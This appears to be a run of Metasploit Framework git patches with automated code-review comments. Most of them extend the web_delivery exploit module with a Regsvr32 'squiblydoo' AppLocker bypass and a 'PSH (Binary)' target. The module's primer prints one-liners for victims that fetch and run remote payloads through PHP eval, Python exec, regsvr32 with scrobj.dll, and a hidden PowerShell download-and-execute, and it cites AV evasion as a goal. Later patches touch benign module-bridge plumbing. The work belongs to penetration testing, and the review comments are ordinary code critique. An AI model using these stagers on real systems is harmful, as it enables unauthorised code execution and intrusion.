Both web requests (i.e., the .sct file and PowerShell download/execute) + can occur on the same port. ), 'License' => MSF_LICENSE, 'Author' => [ 'Andrew Smith "jakx" ', 'Ben Campbell', - 'Chris Campbell' # @obscuresec - Inspiration n.b. no relation! + 'Chris Campbell', # @obscuresec - Inspiration n.b. no relation! + 'Casey Smith', # AppLocker bypass research and vulnerability discovery (@subTee) + 'Trenton Ivey', # AppLocker MSF Module (kn0) ], 'DefaultOptions' => { @@ -41,7 +50,8 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'], ['URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/'], ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'], - ['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'] + ['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'], + ['URL', 'http://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'], ], 'Platform' => %w(python php win), 'Targets' => @@ -57,6 +67,10 @@ class MetasploitModule < Msf::Exploit::Remote ['PSH', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64] + }], + ['Regsvr32', { + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64] }] ], 'DefaultTarget' => 0, 
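Review bot: The rewritten description is ungrammatical in its second and third sentences ('The provided command which will allow for a payload to download and execute. It will do it either specified scripting language interpreter or "squiblydoo" via regsvr32.exe ...'); suggest `The provided command will start the specified scripting language interpreter, or regsvr32.exe using the "squiblydoo" technique, and then download and execute the payload.` The inherited claim that the vector 'does not write to disk so it is less likely to trigger AV solutions' now also covers the Regsvr32 target, where a signed binary fetches an .sct over HTTP — a different detection surface — so it is worth qualifying per target. The `initialize` method continues past the end of the hunk.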
@@ -71,15 +85,21 @@ class MetasploitModule < Msf::Exploit::Remote end def on_request_uri(cli, _request) - print_status('Delivering Payload') - if target.name.include? 'PSH' + if _request.raw_uri =~ /\.sct$/ + print_status("Handling .sct Request") + psh = gen_psh(get_uri) + data = gen_sct_file(psh) + send_response(cli, data, 'Content-Type' => 'text/plain') + elsif target.name.include? 'PSH' or target.name.include? 'Regsvr32' + print_status("Delivering Payload") data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true ) else - data = %Q(#{payload.encoded} ) + print_status("Delivering Payload") + data = %Q(#{payload.encoded}) end send_response(cli, data, 'Content-Type' => 'application/octet-stream') end @@ -94,14 +114,33 @@ class MetasploitModule < Msf::Exploit::Remote print_line('Python:') print_line("python -c \"import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());\"") when 'PSH' + print_line gen_psh(url) + when 'Regsvr32' + print_line("regsvr32 /s /n /u /i:#{url}.sct scrobj.dll") + end + end + + + def gen_psh(url) ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url)) download_and_run = "#{ignore_cert}#{download_string}" print_line generate_psh_command_line( + return generate_psh_command_line( noprofile: true, windowstyle: 'hidden', command: download_and_run ) end end -end + + + def rand_class_id + "#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}" + end + + + def gen_sct_file(command) + %{} + end +end \ No newline at end of file 
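Review bot: The `.sct` branch in `on_request_uri` answers any request whose URI ends in `.sct` with a PowerShell scriptlet regardless of the selected target (PHP and Python included), and the parameter is still named `_request` although it is now read — rename it `request`. The condition `target.name.include? 'PSH' or target.name.include? 'Regsvr32'` uses `or`, the usual Ruby precedence trap; write `target.name.include?('PSH') || target.name.include?('Regsvr32')`. `/\.sct$/` anchors to end-of-line rather than end-of-string; `/\.sct\z/` is the intended check.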
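Review bot: As rendered here the body of `gen_sct_file` is just `%{}`, so the scriptlet XML that should embed `command` and `rand_class_id` appears to have been stripped by extraction, and the part that matters most for this target — how `command` is escaped inside the script element — cannot be reviewed from this page; `rand_class_id` is otherwise unused in the visible code. Once the body is visible, a YARD comment on `gen_sct_file` stating that the CLSID is randomised per request and what happens to quotes or `]]>` inside `command` would be worth adding. The primer builds `regsvr32 /s /n /u /i:#{url}.sct scrobj.dll`, so the `.sct` suffix is appended to `get_uri`; a comment tying that to the `/\.sct$/` check in `on_request_uri` would make the coupling explicit.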
diff --git a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb index bb12511682..1143b831a5 100644 --- a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb +++ b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb @@ -8,6 +8,9 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpServer + include Msf::Module::Deprecated + + deprecated(Date.new(2018, 3, 5), 'exploits/multi/script/web_delivery.rb') def initialize(info = {}) super(update_info(info, From 96f7012fe711c5b22bdb4209dc693575be85b680 Mon Sep 17 00:00:00 2001 From: g0tmi1k Date: Wed, 6 Sep 2017 13:17:28 +0100 Subject: [PATCH 009/254] Code clean up (URLs, ordering and printing) --- modules/exploits/multi/script/web_delivery.rb | 63 ++++++++++--------- 1 file changed, 32 insertions(+), 31 deletions(-) diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index 11a4345eb4..5b652e1a7c 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb 
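Review bot: `deprecated(Date.new(2018, 3, 5), 'exploits/multi/script/web_delivery.rb')` names the replacement as a file path with a `.rb` suffix; if the helper prints this as the module to `use`, the suffix will not resolve, so confirm whether it expects `exploit/multi/script/web_delivery`. A one-line comment pointing operators at the new module's `Regsvr32` target would make the migration obvious.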
@@ -47,11 +47,11 @@ class MetasploitModule < Msf::Exploit::Remote }, 'References' => [ - ['URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'], - ['URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/'], + ['URL', 'https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'], + ['URL', 'https://www.pentestgeek.com/2013/07/19/invoke-shellcode/'], ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'], - ['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'], - ['URL', 'http://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'], + ['URL', 'https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'], + ['URL', 'https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'], ], 'Platform' => %w(python php win), 'Targets' => 
@@ -84,39 +84,43 @@ class MetasploitModule < Msf::Exploit::Remote ) end + + def primer + url = get_uri + print_status("Run the following command on the target machine:") + case target.name + when 'PHP' + print_line(%Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{url}'));")) + when 'Python' + print_line(%Q(python -c "import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());")) + when 'PSH' + print_line(gen_psh(url)) + when 'Regsvr32' + print_line("regsvr32 /s /n /u /i:#{url}.sct scrobj.dll") + end + end + + def on_request_uri(cli, _request) if _request.raw_uri =~ /\.sct$/ - print_status("Handling .sct Request") psh = gen_psh(get_uri) data = gen_sct_file(psh) - send_response(cli, data, 'Content-Type' => 'text/plain') elsif target.name.include? 'PSH' or target.name.include? 'Regsvr32' - print_status("Delivering Payload") data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true ) else - print_status("Delivering Payload") data = %Q(#{payload.encoded}) end - send_response(cli, data, 'Content-Type' => 'application/octet-stream') - end - def primer - url = get_uri - print_status('Run the following command on the target machine:') - case target.name - when 'PHP' - print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"") - when 'Python' - print_line('Python:') - print_line("python -c \"import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());\"") - when 'PSH' - print_line gen_psh(url) - when 'Regsvr32' - print_line("regsvr32 /s /n /u /i:#{url}.sct scrobj.dll") + if _request.raw_uri =~ /\.sct$/ + print_status("Handling .sct Request") + send_response(cli, data, 'Content-Type' => 'text/plain') + else + print_status("Delivering Payload") + send_response(cli, data, 'Content-Type' => 'application/octet-stream') end end 
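Review bot: `on_request_uri` names its second parameter `_request` but reads `_request.raw_uri` twice, so the leading underscore (the convention for an unused parameter) is misleading and the `.sct` match is evaluated once at the top and again before `send_response`. Rename it to `request`, compute the test once as `is_sct = request.raw_uri =~ /\.sct\z/` and branch on that in both places; `\z` is preferable to `$`, which matches before any embedded newline rather than only at the end of the string. The `elsif target.name.include? 'PSH' or target.name.include? 'Regsvr32'` line uses `or`, whose low precedence is a known trap — prefer `||`. `data = %Q(#{payload.encoded})` is just `payload.encoded`.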
@@ -125,13 +129,10 @@ class MetasploitModule < Msf::Exploit::Remote ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url)) download_and_run = "#{ignore_cert}#{download_string}" - print_line generate_psh_command_line( - return generate_psh_command_line( - noprofile: true, - windowstyle: 'hidden', - command: download_and_run - ) - end + return generate_psh_command_line(noprofile: true, + windowstyle: 'hidden', + command: download_and_run + ) end @@ -143,4 +144,4 @@ class MetasploitModule < Msf::Exploit::Remote def gen_sct_file(command) %{} end -end \ No newline at end of file +end From accb77d268e4ada135ff4df82b5b2dc7c190a9f4 Mon Sep 17 00:00:00 2001 From: g0tmi1k Date: Thu, 7 Sep 2017 10:55:29 +0100 Subject: [PATCH 010/254] Add PSH (Binary) as a target to web_delivery --- modules/exploits/multi/script/web_delivery.rb | 63 ++++++++++++++++--- 1 file changed, 53 insertions(+), 10 deletions(-) diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index 5b652e1a7c..873185fd37 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -8,6 +8,7 @@ require 'msf/core/exploit/powershell' class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking + include Msf::Exploit::EXE include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpServer 
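Review bot: The explicit `return` in front of `generate_psh_command_line(...)` is redundant now that the call is the method's last expression, and the closing `)` on its own line with the keyword arguments aligned to the opening paren is a layout RuboCop will flag; drop the `return` and either keep the call on one line or indent one keyword per line with `)` closing the last. The context line `ignore_cert = ... if ssl` leaves `ignore_cert` as `nil` on plain HTTP, which the interpolation tolerates, but a comment such as `# nil when SSL is off; interpolates to ''` would spare the next reader the check. The start of `gen_psh` is outside the hunk.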
@@ -31,6 +32,8 @@ class MetasploitModule < Msf::Exploit::Remote The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute) can occur on the same port. + + "PSH (Binary)" will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed. ), 'License' => MSF_LICENSE, 'Author' => @@ -40,6 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Chris Campbell', # @obscuresec - Inspiration n.b. no relation! 'Casey Smith', # AppLocker bypass research and vulnerability discovery (@subTee) 'Trenton Ivey', # AppLocker MSF Module (kn0) + 'g0tmi1k', # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features ], 'DefaultOptions' => { @@ -71,6 +75,10 @@ class MetasploitModule < Msf::Exploit::Remote ['Regsvr32', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64] + }], + ['PSH (Binary)', { + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64] }] ], 'DefaultTarget' => 0, 
@@ -79,32 +87,43 @@ class MetasploitModule < Msf::Exploit::Remote register_advanced_options( [ - OptBool.new('PSH-Proxy', [ true, 'PowerShell - Use the system proxy', true ]) + OptBool.new('PSH-Proxy', [ true, 'PSH - Use the system proxy', true ]), + OptString.new('PSHBinary-PATH', [ false, 'PSH (Binary) - The folder to store the file on the target machine (Will be %TEMP% if left blank)', '' ]), + OptString.new('PSHBinary-FILENAME', [ false, 'PSH (Binary) - The filename to use (Will be random if left blank)', '' ]), ], self.class ) end def primer - url = get_uri + php = %Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{get_uri}'));") + python = %Q(python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{get_uri}');exec(r.read());") + regsvr = %Q(regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll) + print_status("Run the following command on the target machine:") case target.name when 'PHP' - print_line(%Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{url}'));")) + print_line("#{php}") when 'Python' - print_line(%Q(python -c "import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());")) + print_line("#{python}") when 'PSH' - print_line(gen_psh(url)) + psh = gen_psh("#{get_uri}", "string") + print_line("#{psh}") when 'Regsvr32' - print_line("regsvr32 /s /n /u /i:#{url}.sct scrobj.dll") + print_line("#{regsvr}") + when 'PSH (Binary)' + psh = gen_psh("#{get_uri}", "download") + print_line("#{psh}") end end def on_request_uri(cli, _request) if _request.raw_uri =~ /\.sct$/ - psh = gen_psh(get_uri) + psh = gen_psh("#{get_uri}", "string") data = gen_sct_file(psh) + elsif target.name.include? 'PSH (Binary)' + data = generate_payload_exe elsif target.name.include? 'PSH' or target.name.include? 'Regsvr32' data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, 
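Review bot: The advanced options registered here are `PSHBinary-PATH` and `PSHBinary-FILENAME`, but `gen_psh` in the next hunk reads `datastore['BinaryEXE-PATH']` and `datastore['BinaryEXE-FILENAME']`, so whatever the operator sets is ignored and the fallbacks are always used; pick one name and use it in both places. In `primer`, `print_line("#{php}")` and `gen_psh("#{get_uri}", "string")` interpolate values that are already strings — `print_line(php)` and `gen_psh(get_uri, 'string')` read cleaner. The `'PSH (Binary)'` branch in `on_request_uri` is correctly tested before the substring check for `'PSH'`, which would also match it; a one-line comment saying so would keep a future reorder from breaking it.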
@@ -125,10 +144,34 @@ class MetasploitModule < Msf::Exploit::Remote end - def gen_psh(url) + def gen_psh(url, *method) ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl - download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url)) - download_and_run = "#{ignore_cert}#{download_string}" + + if method.include? 'string' + download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url)) + download_and_run = "#{ignore_cert}#{download_string}" + else + # Random filename to use, if there isn't anything set + random = "#{rand_text_alphanumeric 8}.exe" + + # Set filename (Use random filename if empty) + filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME'] + + # Set path (Use %TEMP% if empty) + path = datastore['BinaryEXE-PATH'].blank? ? "$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}') + + # Join Path and Filename + file = %Q(echo (#{path}+'\\#(unknown)')) + + # Generate download PowerShell command + #download_string = Rex::Powershell::PshMethods.download(url, "$z") # Can't use, due to single vs double quotes in the URL + download_string = %Q^(new-object System.Net.WebClient).DownloadFile('#{url}', "$z")^ + + # Join PowerShell commands up + download_and_run = "$z=#{file};#{ignore_cert}#{download_string};invoke-item $z" + end + + # Generate main PowerShell command return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run From 4ea8f639a3c3fd42184646d18570fa520419fee4 Mon Sep 17 00:00:00 2001 
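Review bot: As rendered, `file = %Q(echo (#{path}+'\\#(unknown)'))` never references the `filename` computed two lines earlier, so either `filename` is dead or the interpolation was lost in rendering — presumably it should be `#{filename}`; please confirm in the actual source. `gen_psh(url, *method)` takes a splat and tests `method.include? 'string'`, which silently accepts any number of stray arguments; a keyword, `def gen_psh(url, mode: 'string')` with `mode == 'string'` in the branch, makes both call sites self-describing. The `# Set path (Use %TEMP% if empty)` comment could also say why the path is written in PowerShell syntax (`$env:temp`) rather than expanded in Ruby, since that is not obvious from the line.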
From: Adam Cammack Date: Fri, 22 Sep 2017 11:42:32 -0500 Subject: [PATCH 011/254] Add host and service reporting to external modules --- lib/msf/core/module/external.rb | 75 ++++++++++++++---- lib/msf/core/modules/external/bridge.rb | 77 ++++++++++++++----- lib/msf/core/modules/external/message.rb | 20 ++++- .../external/python/metasploit/module.py | 31 ++++++-- lib/msf/core/modules/external/shim.rb | 3 + .../external/templates/capture_server.erb | 1 - 6 files changed, 163 insertions(+), 44 deletions(-) diff --git a/lib/msf/core/module/external.rb b/lib/msf/core/module/external.rb index 3e4ac1a451..ed9705a942 100644 --- a/lib/msf/core/module/external.rb +++ b/lib/msf/core/module/external.rb 
@@ -1,23 +1,72 @@ +include Msf::Auxiliary::Report + module Msf::Module::External def wait_status(mod) while mod.running m = mod.get_status if m - case m['level'] - when 'error' - print_error m['message'] - when 'warning' - print_warning m['message'] - when 'good' - print_good m['message'] - when 'info' - print_status m['message'] - when 'debug' - vprint_status m['message'] - else - print_status m['message'] + case m.method + when :message + log_output(m) + when :report + process_report(m) + when :reply + # we're done + break end end end end + + def log_output(m) + message = m.params['message'] + + case m.params['level'] + when 'error' + print_error message + when 'warning' + print_warning message + when 'good' + print_good message + when 'info' + print_status message + when 'debug' + vprint_status message + else + print_status message + end + end + + def process_report(m) + data = m.params['data'] + + case m.params['type'] + when 'host' + # Required + host = {host: data['host']} + + # Optional + host[:state] = data['state'] if data['state'] # TODO: validate -- one of the Msf::HostState constants (unknown, alive, dead) + host[:os_name] = data['os_name'] if data['os_name'] + host[:os_flavor] = data['os_flavor'] if data['os_flavor'] + host[:os_sp] = data['os_sp'] if data['os_sp'] + host[:os_lang] = data['os_lang'] if data['os_lang'] + host[:arch] = data['arch'] if data['arch'] # TODO: validate -- one of the ARCH_* constants + host[:mac] = data['mac'] if data['mac'] + host[:scope] = data['scope'] if data['scope'] + host[:virtual_host] = data['virtual_host'] if data['virtual_host'] + + report_host(host) + when 'service' + # Required + service = {host: data['host'], port: data['port'], proto: data['proto']} + + # Optional + service[:name] = data['name'] if data['name'] + + report_service(service) + else + print_warning "Skipping unrecognized report type #{m.params['type']}" + end + end end 
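Review bot: `include Msf::Auxiliary::Report` is at file top level, outside `module Msf::Module::External`, so it mixes the reporting methods into `Object` for every class in the process instead of into the modules that include `Msf::Module::External`; move it inside the module body. `process_report` dereferences `m.params['data']` without checking it, so a report message whose `params` lack `data` raises `NoMethodError` on nil inside the `case`; guard with `return print_warning('report message without data') unless data.is_a?(Hash)` before the `case`. The values copied into `host` and `service` come from the external module's stdout and go straight to `report_host`/`report_service`; the two `TODO: validate` comments already mark `state` and `arch`, and `port` deserves the same (an Integer in range) before it reaches the database.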
diff --git a/lib/msf/core/modules/external/bridge.rb b/lib/msf/core/modules/external/bridge.rb index 0a031d668c..5ffcc6b0a2 100644 --- a/lib/msf/core/modules/external/bridge.rb +++ b/lib/msf/core/modules/external/bridge.rb @@ -2,6 +2,7 @@ require 'msf/core/modules/external' require 'msf/core/modules/external/message' require 'open3' +require 'json' class Msf::Modules::External::Bridge @@ -26,14 +27,13 @@ class Msf::Modules::External::Bridge def get_status if self.running - n = receive_notification - if n && n['params'] - n['params'] - else + m = receive_notification + if m.nil? close_ios self.running = false - n['response'] if n end + + return m end end @@ -41,30 +41,33 @@ class Msf::Modules::External::Bridge self.env = {} self.running = false self.path = module_path + self.cmd = [self.path, self.path] + self.messages = Queue.new end protected attr_writer :path, :running - attr_accessor :env, :ios + attr_accessor :cmd, :env, :ios, :messages def describe resp = send_receive(Msf::Modules::External::Message.new(:describe)) close_ios - resp['response'] + resp.params end - # XXX TODO non-blocking writes, check write lengths, non-blocking JSON parse loop read + # XXX TODO non-blocking writes, check write lengths def send_receive(message) send(message) - read_json(message.id, self.ios[1]) + recv(message.id) end def send(message) - input, output, status = ::Open3.popen3(env, [self.path, self.path]) + input, output, status = ::Open3.popen3(self.env, self.cmd) self.ios = [input, output, status] - case Rex::ThreadSafe.select(nil, [input], nil, 0.1) + # We would call Rex::Threadsafe directly, but that would require rex for standalone use + case select(nil, [input], nil, 0.1) when nil raise "Cannot run module #{self.path}" when [[], [input], []] 
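Review bot: `get_status` now treats only `nil` from `receive_notification` as end-of-stream, but `recv` (next hunk) still returns `{}` from its unchanged `rescue EOFError` branch, so on EOF `get_status` hands an empty Hash to `wait_status`, where `m.method` on a Hash raises rather than ending the loop. Return `nil` from that rescue and have `describe` check for it before `resp.params`, which would otherwise fail on the Hash as well. The `return m` at the end of `get_status` is redundant; `m` as the last expression suffices.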
@@ -76,12 +79,10 @@ class Msf::Modules::External::Bridge end def receive_notification - input, output, status = self.ios - case Rex::ThreadSafe.select([output], nil, nil, 10) - when nil - nil - when [[output], [], []] - read_json(nil, output) + if self.messages.empty? + recv + else + self.messages.pop end end @@ -89,10 +90,46 @@ class Msf::Modules::External::Bridge fd.write(json) end - def read_json(id, fd) + def recv(filter_id=nil, timeout=600) + _, fd, _ = self.ios + + # Multiple messages can come over the wire all at once, and since yajl + # doesn't play nice with windows, we have to emulate a state machine to + # read just enough off the wire to get one request at a time. Since + # Windows cannot do a nonblocking read on a pipe, we are forced to do a + # whole lot of `select` syscalls :( + buf = "" begin - resp = fd.readpartial(10_000) - JSON.parse(resp) + loop do + # We would call Rex::Threadsafe directly, but that would require Rex for standalone use + case select([fd], nil, nil, timeout) + when nil + # This is what we would have gotten without Rex and what `readpartial` can also raise + raise EOFError.new + when [[fd], [], []] + c = fd.readpartial(1) + buf << c + + # This is so we don't end up calling JSON.parse on every char and + # having to catch an exception. Windows can't do nonblock on pipes, + # so we still have to do the select each time. + break if c == '}' + end + end + + m = Msf::Modules::External::Message.from_module(JSON.parse(buf)) + if filter_id && m.id != filter_id + # We are filtering for a response to a particular message, but we got + # something else, store the message and try again + self.messages.push m + read_json(filter_id, timeout) + else + # Either we weren't filtering, or we got what we were looking for + m + end + rescue JSON::ParserError + # Probably an incomplete response, but no way to really tell + retry rescue EOFError => e {} end 
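Review bot: `recv` calls `read_json(filter_id, timeout)` when a message arrives that does not match `filter_id`, but `read_json` is the very method this hunk renames to `recv`, so the first out-of-order message raises `NoMethodError`; change it to `recv(filter_id, timeout)`. The `rescue JSON::ParserError` / `retry` pair is unbounded: a child that writes anything that never parses as JSON (a stray print to stdout, say) keeps the loop spinning one byte per `select` until the 600 s timeout, so cap the retries or at least `vprint_status` once before retrying. `buf = ""` deliberately sits outside the `begin` so `retry` accumulates rather than restarts — worth a comment, because at first read it looks like a bug.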
diff --git a/lib/msf/core/modules/external/message.rb b/lib/msf/core/modules/external/message.rb index 429e47fc00..ba3b739a71 100644 --- a/lib/msf/core/modules/external/message.rb +++ b/lib/msf/core/modules/external/message.rb @@ -2,11 +2,25 @@ require 'msf/core/modules/external' require 'base64' require 'json' +require 'securerandom' class Msf::Modules::External::Message - attr_reader :method, :id - attr_accessor :params + attr_reader :method + attr_accessor :params, :id + + def self.from_module(j) + if j['method'] + m = self.new(j['method'].to_sym) + m.params = j['params'] + m + elsif j['response'] + m = self.new(:reply) + m.params = j['response'] + m.id = j['id'] + m + end + end def initialize(m) self.method = m @@ -20,5 +34,5 @@ class Msf::Modules::External::Message protected - attr_writer :method, :id + attr_writer :method end diff --git a/lib/msf/core/modules/external/python/metasploit/module.py b/lib/msf/core/modules/external/python/metasploit/module.py index 288a8065b2..2f12c8210d 100644 --- a/lib/msf/core/modules/external/python/metasploit/module.py +++ b/lib/msf/core/modules/external/python/metasploit/module.py 
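Review bot: `Message.from_module` returns `nil` when the parsed hash has neither `method` nor `response`; with a `filter_id` set, `Bridge#recv` then calls `m.id` on `nil`, and without one the `nil` is indistinguishable from end-of-stream. Add `else raise ArgumentError, "unrecognised external-module message: #{j.keys.inspect}"` so a malformed line is reported as such. `j['method'].to_sym` interns a string chosen by the child process; symbols are garbage-collected on supported Rubies so this is not a leak, but checking against the small set the receiver understands (`message`, `report`) before converting would fail fast on typos. `require 'securerandom'` is added but nothing in this hunk uses it — presumably for `id` generation elsewhere; confirm it is needed.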
@@ -1,20 +1,37 @@ import sys, os, json def log(message, level='info'): - print(json.dumps({'jsonrpc': '2.0', 'method': 'message', 'params': { + rpc_send({'jsonrpc': '2.0', 'method': 'message', 'params': { 'level': level, 'message': message - }})) - sys.stdout.flush() + }}) + +def report_host(ip, opts={}): + host = opts.copy() + host.update({'host': ip}) + rpc_send({'jsonrpc': '2.0', 'method': 'report', 'params': { + 'type': 'host', 'data': host + }}) + +def report_service(ip, opts={}): + service = opts.copy() + service.update({'host': ip}) + rpc_send({'jsonrpc': '2.0', 'method': 'report', 'params': { + 'type': 'service', 'data': service + }}) + def run(metadata, exploit): req = json.loads(os.read(0, 10000)) if req['method'] == 'describe': - print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata})) + rpc_send({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata}) elif req['method'] == 'run': args = req['params'] exploit(args) - print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': { + rpc_send({'jsonrpc': '2.0', 'id': req['id'], 'response': { 'message': 'Exploit completed' - }})) - sys.stdout.flush() + }}) + +def rpc_send(req): + print(json.dumps(req)) + sys.stdout.flush() diff --git a/lib/msf/core/modules/external/shim.rb b/lib/msf/core/modules/external/shim.rb index 4b64d8871f..903f659799 100644 --- a/lib/msf/core/modules/external/shim.rb +++ b/lib/msf/core/modules/external/shim.rb @@ -11,6 +11,9 @@ class Msf::Modules::External::Shim remote_exploit_cmd_stager(mod) when 'capture_server' capture_server(mod) + else + # TODO have a nice load error show up in the logs + '' end end diff --git a/lib/msf/core/modules/external/templates/capture_server.erb b/lib/msf/core/modules/external/templates/capture_server.erb index cbcb4735b8..853350fa67 100644 --- a/lib/msf/core/modules/external/templates/capture_server.erb +++ b/lib/msf/core/modules/external/templates/capture_server.erb 
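Review bot: `report_service(ip, opts={})` forwards whatever keys the caller supplies, but the Ruby receiver in `lib/msf/core/module/external.rb` treats `port` and `proto` as required alongside `host`; make them explicit, `def report_service(ip, port, proto, opts=None)`, so the omission fails in the module rather than producing an incomplete record. The mutable default `opts={}` is harmless only because each function copies it first; `opts=None` with `opts = dict(opts or {})` is the conventional way to say that. `rpc_send` is defined after its first use, which is legal but reads oddly; a short docstring (`Write one JSON-RPC message to stdout and flush it so the pipe is not left buffered`) would also explain the `flush`.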
@@ -2,7 +2,6 @@ require 'msf/core/modules/external/bridge' require 'msf/core/module/external' class MetasploitModule < Msf::Auxiliary - # include Msf::Auxiliary::Report include Msf::Module::External def initialize From 62aac450f8951ef13ae637bda0d0b2c4ed791607 Mon Sep 17 00:00:00 2001 From: Adam Cammack Date: Fri, 22 Sep 2017 11:43:26 -0500 Subject: [PATCH 012/254] Change confusing variable name --- lib/msf/core/module_manager/loading.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/module_manager/loading.rb b/lib/msf/core/module_manager/loading.rb index 4968937ae4..98d9a1c56d 100644 --- a/lib/msf/core/module_manager/loading.rb +++ b/lib/msf/core/module_manager/loading.rb @@ -116,8 +116,8 @@ module Msf::ModuleManager::Loading loaders.each do |loader| if loader.loadable?(path) - count_by_type.merge!(loader.load_modules(path, options)) do |key, old, new| - old + new + count_by_type.merge!(loader.load_modules(path, options)) do |key, prev, now| + prev + now end end end From 1ee590ac0781e1a9a701dd2b2b14e8454030a59a Mon Sep 17 00:00:00 2001 From: g0tmi1k Date: Mon, 25 Sep 2017 13:45:06 +0100 Subject: [PATCH 013/254] Move over to rex-powershell and version bump Version bump for: - https://github.com/rapid7/rex-powershell/pull/10 - https://github.com/rapid7/rex-powershell/pull/11 --- metasploit-framework.gemspec | 2 +- modules/exploits/multi/script/web_delivery.rb | 9 +++------ 2 files changed, 4 insertions(+), 7 deletions(-) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index ec4ed157c9..c796bb97d9 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec 
